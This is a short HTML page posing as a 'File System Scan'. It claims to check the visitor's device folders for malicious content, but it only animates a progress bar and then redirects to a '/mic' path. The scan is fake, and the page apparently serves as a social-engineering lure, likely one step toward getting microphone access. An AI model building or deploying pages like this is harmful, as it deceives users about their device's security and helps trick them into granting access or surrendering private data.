<!DOCTYPE html>
<html>
<head>
    <title>File System Scan</title>
    <style>
        body { font-family: Arial, sans-serif; background-color: #f5f5f5; margin: 0; padding: 20px; }
        .container { max-width: 800px; margin: 0 auto; background: white; padding: 20px; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
        h2 { color: #2c3e50; text-align: center; }
        .file-list { margin: 20px 0; }
        .file-item { padding: 10px; border-bottom: 1px solid #eee; }
        .progress { height: 20px; background: #e0e0e0; border-radius: 10px; margin: 20px 0; }
        .progress-bar { height: 100%; width: 0%; background: #3498db; border-radius: 10px; transition: width 2s; }
    </style>
    <script>
        window.onload = function() {
            setTimeout(function() {
                document.querySelector('.progress-bar').style.width = '100%';
                setTimeout(function() {
                    window.location.href = '/mic';
                }, 2000);
            }, 1000);
        };
    </script>
</head>
<body>
    <div class="container">
        <h2>File System Scan</h2>
        <p>Scanning your device files for malicious content...</p>
        <div class="file-list">
            <div class="file-item">Documents/</div>
            <div class="file-item">Downloads/</div>
            <div class="file-item">Pictures/</div>
            <div class="file-item">Videos/</div>
        </div>
        <div class="progress">
            <div class="progress-bar"></div>
        </div>
        <p>Analyzing file system structure and content...</p>
    </div>
</body>
</html>